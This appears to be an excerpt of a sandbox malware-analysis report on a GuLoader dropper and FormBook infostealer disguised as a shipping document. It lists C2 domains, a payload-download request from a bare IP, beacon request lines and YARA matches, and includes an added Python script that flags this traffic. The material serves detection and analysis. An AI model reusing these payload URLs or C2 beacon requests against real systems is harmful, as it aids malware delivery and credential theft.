    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.worstcasebestcase.com/u2e/www.daveadonai.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.worstcasebestcase.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
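The traffic above has two distinct stages: GuLoader fetching the second-stage payload bin_SQZyzLkAMl175.bin from a bare IP with a spoofed IE11 User-Agent (what Snort 2018752 fired on), and FormBook beaconing with GET /u2e/?J6A=<base64>&YL3=... and no User-Agent to hosts drawn from the 16 /u2e/ domains recovered from explorer.exe memory. The Python below is an added example, not part of the report: it parses raw HTTP requests and flags both stages. The URI regex generalises the one observed shape (an assumption: a 3-4 character path segment, two 3-character query keys, a base64-like first value), the domain list is copied from the strings above, and the requests it runs on are constructed from the report's request lines (the request bodies are omitted and the benign control request is made up).

```python
"""Flag the two HTTP stages seen in this report: GuLoader's .bin fetch from a bare IP
and FormBook's /u2e/ beacons. Added example, not Joe Sandbox code; the requests are
constructed from the request lines above (the benign control request is made up).
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# The 16 /u2e/ hosts recovered from explorer.exe memory (strings above).
C2_DOMAINS = {
    "www.2794moraga.com", "www.6936399.com", "www.adesignmuseum.net", "www.ahyqmux.icu",
    "www.baisongke.com", "www.catearhelmet.com", "www.colettesimonepsyd.com",
    "www.daveadonai.com", "www.jsbdistributor.com", "www.moneysavingexpertmonarch.xyz",
    "www.nacesiti.com", "www.onehealthtaskforce.com", "www.pinacle.online",
    "www.severbroke.com", "www.theselfunknown.com", "www.worstcasebestcase.com",
}

# Generalised from the observed /u2e/?J6A=<base64>&YL3=9rN46F (assumption: 3-4 char
# path segment, two 3-char query keys, a base64-like first value of 16+ chars).
FORMBOOK_URI = re.compile(
    r"^/[A-Za-z0-9]{3,4}/\?[A-Za-z0-9]{3}=[A-Za-z0-9+/=]{16,}&[A-Za-z0-9]{3}=[A-Za-z0-9]+$"
)


def parse_request(raw: str) -> Dict[str, str]:
    """Minimal HTTP/1.x request parser: method, target, lower-cased Host, User-Agent."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return {"method": method, "target": target,
            "host": headers.get("host", "").lower(),
            "user_agent": headers.get("user-agent", "")}


def is_dotted_quad(host: str) -> bool:
    """True when the Host header is a literal IPv4 address (optionally with :port)."""
    try:
        ipaddress.IPv4Address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def classify(req: Dict[str, str]) -> List[str]:
    rules: List[str] = []
    # FormBook beacon: the /u2e/ URI shape, sent without a User-Agent (as in the
    # report) or to a host from the recovered C2 list.
    if FORMBOOK_URI.match(req["target"]) and (not req["user_agent"] or req["host"] in C2_DOMAINS):
        rules.append("formbook_c2_beacon")
    # Payload fetch: a .bin from a bare IPv4 host (what Snort 2018752 keys on). The
    # IE11 User-Agent is copied from the download above; it is not the suspicious part.
    if is_dotted_quad(req["host"]) and req["target"].lower().endswith(".bin"):
        rules.append("bin_download_from_dotted_quad")
    return rules


def triage(raw_requests: List[str]) -> List[Tuple[str, str]]:
    out: List[Tuple[str, str]] = []
    for raw in raw_requests:
        req = parse_request(raw)
        out.extend((req["host"], rule) for rule in classify(req))
    return out


def _req(*lines: str) -> str:
    return "\r\n".join(lines) + "\r\n\r\n"


IE11_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
# Constructed from the request lines in the report; bodies omitted, last request made up.
SAMPLE_REQUESTS = [
    _req("GET /bin_SQZyzLkAMl175.bin HTTP/1.1", f"User-Agent: {IE11_UA}",
         "Host: 192.210.146.118", "Cache-Control: no-cache"),
    _req("GET /u2e/?J6A=fOOvFeCRGZilV5FD1+mHhwrLgezxAS8nC209VBcY21t/5KoEoUJzgkM0WV81yJyaD6Gl&YL3=9rN46F HTTP/1.1",
         "Host: www.nacesiti.com", "Connection: close"),
    _req("GET /u2e/?J6A=V7ZtMDwObpOpn50+hc8lwEJpQXPQmbRBnH5Le+G+KvZbJWeIncKybJk7aoLw9MwxtSCc&YL3=9rN46F HTTP/1.1",
         "Host: www.catearhelmet.com", "Connection: close"),
    # Benign control: ordinary browsing with a User-Agent should not fire.
    _req("GET /index.html HTTP/1.1", "Host: www.example.com", f"User-Agent: {IE11_UA}"),
]

if __name__ == "__main__":
    for host, rule in triage(SAMPLE_REQUESTS):
        print(f"{host}: {rule}")
```

The two 403 responses in the Snort output (from Cloudflare and Google address space) are what you would expect from this pattern: FormBook rotates through its domain list, and several of the names are parked or sinkholed, so a host that hits the beacon shape against many different domains in a short window is a stronger signal than any one match.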

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match; File source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E189660
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E1896E0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E189710
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E189780
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E1897A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,1_2_1E189540
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,1_2_1E1895D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E189A00
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,1_2_1E189A20
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,1_2_1E189A50
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,1_2_1E189840
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E189860
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E1898F0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E189910
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,1_2_1E1899A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189610 NtEnumerateValueKey,1_2_1E189610
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189650 NtQueryValueKey,1_2_1E189650
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189670 NtQueryInformationProcess,1_2_1E189670
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1896D0 NtCreateKey,1_2_1E1896D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E18A710 NtOpenProcessToken, 1_2_1E18A710
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189730 NtQueryVirtualMemory, 1_2_1E189730
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E18A770 NtOpenThread, 1_2_1E18A770
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189770 NtSetInformationFile, 1_2_1E189770
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189760 NtOpenProcess, 1_2_1E189760
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189FE0 NtCreateMutant, 1_2_1E189FE0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E18AD30 NtSetContextThread, 1_2_1E18AD30
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189520 NtWaitForSingleObject, 1_2_1E189520
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189560 NtWriteFile, 1_2_1E189560
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1895F0 NtQueryInformationFile, 1_2_1E1895F0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189A10 NtQuerySection, 1_2_1E189A10
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189A80 NtOpenDirectoryObject, 1_2_1E189A80
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189B00 NtSetValueKey, 1_2_1E189B00
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E18A3B0 NtGetContextThread, 1_2_1E18A3B0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189820 NtEnumerateKey, 1_2_1E189820
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E18B040 NtSuspendThread, 1_2_1E18B040
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1898A0 NtWriteVirtualMemory, 1_2_1E1898A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E189950 NtQueueApcThread, 1_2_1E189950
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1899D0 NtCreateProcessEx, 1_2_1E1899D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564A5D NtProtectVirtualMemory, 1_2_00564A5D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_0056505B NtSetInformationThread, 1_2_0056505B
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00565077 NtSetInformationThread, 1_2_00565077
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00560878 NtProtectVirtualMemory, 1_2_00560878
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00560427 NtSetInformationThread, 1_2_00560427
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564107 NtSetInformationThread, 1_2_00564107
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00563E60 NtSetInformationThread, 1_2_00563E60
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564F47 NtSetInformationThread, 1_2_00564F47
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564F4F NtSetInformationThread, 1_2_00564F4F
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564F03 NtSetInformationThread, 1_2_00564F03
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_00564F3F NtSetInformationThread, 1_2_00564F3F
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9540 NtReadFile, LdrInitializeThunk, 11_2_046F9540
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F95D0 NtClose, LdrInitializeThunk, 11_2_046F95D0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9660 NtAllocateVirtualMemory, LdrInitializeThunk, 11_2_046F9660
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9650 NtQueryValueKey, LdrInitializeThunk, 11_2_046F9650
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F96E0 NtFreeVirtualMemory, LdrInitializeThunk, 11_2_046F96E0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F96D0 NtCreateKey, LdrInitializeThunk, 11_2_046F96D0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9710 NtQueryInformationToken, LdrInitializeThunk, 11_2_046F9710
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9FE0 NtCreateMutant, LdrInitializeThunk, 11_2_046F9FE0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9780 NtMapViewOfSection, LdrInitializeThunk, 11_2_046F9780
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9860 NtQuerySystemInformation, LdrInitializeThunk, 11_2_046F9860
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9840 NtDelayExecution, LdrInitializeThunk, 11_2_046F9840
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 11_2_046F9910
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F99A0 NtCreateSection, LdrInitializeThunk, 11_2_046F99A0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9A50 NtCreateFile, LdrInitializeThunk, 11_2_046F9A50
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9560 NtWriteFile, 11_2_046F9560
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9520 NtWaitForSingleObject, 11_2_046F9520
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046FAD30 NtSetContextThread, 11_2_046FAD30
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F95F0 NtQueryInformationFile, 11_2_046F95F0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9670 NtQueryInformationProcess, 11_2_046F9670
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9610 NtEnumerateValueKey, 11_2_046F9610
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9760 NtOpenProcess, 11_2_046F9760
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046FA770 NtOpenThread, 11_2_046FA770
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9770 NtSetInformationFile, 11_2_046F9770
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9730 NtQueryVirtualMemory, 11_2_046F9730
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046FA710 NtOpenProcessToken, 11_2_046FA710
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F97A0 NtUnmapViewOfSection, 11_2_046F97A0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046FB040 NtSuspendThread, 11_2_046FB040
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9820 NtEnumerateKey, 11_2_046F9820
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F98F0 NtReadVirtualMemory, 11_2_046F98F0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F98A0 NtWriteVirtualMemory, 11_2_046F98A0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9950 NtQueueApcThread, 11_2_046F9950
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F99D0 NtCreateProcessEx, 11_2_046F99D0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9A20 NtResumeThread, 11_2_046F9A20
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9A00 NtProtectVirtualMemory, 11_2_046F9A00
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9A10 NtQuerySection, 11_2_046F9A10
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9A80 NtOpenDirectoryObject, 11_2_046F9A80
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046F9B00 NtSetValueKey, 11_2_046F9B00
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046FA3B0 NtGetContextThread, 11_2_046FA3B0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041A060 NtClose, 11_2_0041A060
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041A110 NtAllocateVirtualMemory, 11_2_0041A110
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00419F30 NtCreateFile, 11_2_00419F30
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00419FE0 NtReadFile, 11_2_00419FE0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041A05B NtClose, 11_2_0041A05B
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041A10B NtAllocateVirtualMemory, 11_2_0041A10B
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00419EEA NtCreateFile, 11_2_00419EEA
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00419F2A NtCreateFile, 11_2_00419F2A
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00419FE2 NtReadFile, 11_2_00419FE2
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E166E30
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E20D616
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E212EF7
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E211FF1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E21DFCE
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E15841F
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E20D466
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E212D07
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E140D20
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E211D55
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E172581
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E15D5E0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E2125DD
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1FFA2B
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E2122AE
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E212B28
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E16AB40
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E17EBB0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E20DBD2
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E2003DA
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E21E824
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E201002
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E16A830
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E15B090
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E2120A8
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1720A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E2128EC
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E14F900
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E164120
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E1699BF
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0477D466
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046C841F
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04781D55
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046B0D20
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04782D07
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046CD5E0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_047825DD
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046E2581
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046D6E30
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0477D616
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04782EF7
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04781FF1
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0478DFCE
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0478E824
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046DA830
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04771002
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_047828EC
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046E20A0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_047820A8
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046CB090
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046D4120
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046BF900
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046D99BF
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0476FA2B
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_047822AE
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046DAB40
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_04782B28
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0477DBD2
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_047703DA
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_046EEBB0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041E1AE
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041EC93
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00402D87
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00402D90
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00409E40
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00409E3B
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041E77F
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00402FB0
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 046BB150 appears 72 times
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: String function: 1E14B150 appears 72 times
    Source: AWB_&_Shipping Doc.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.227574850.000000000040A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.303381103.000000001E23F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000000.226821065.000000000040A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297547518.00000000023C0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe | Binary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: 0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
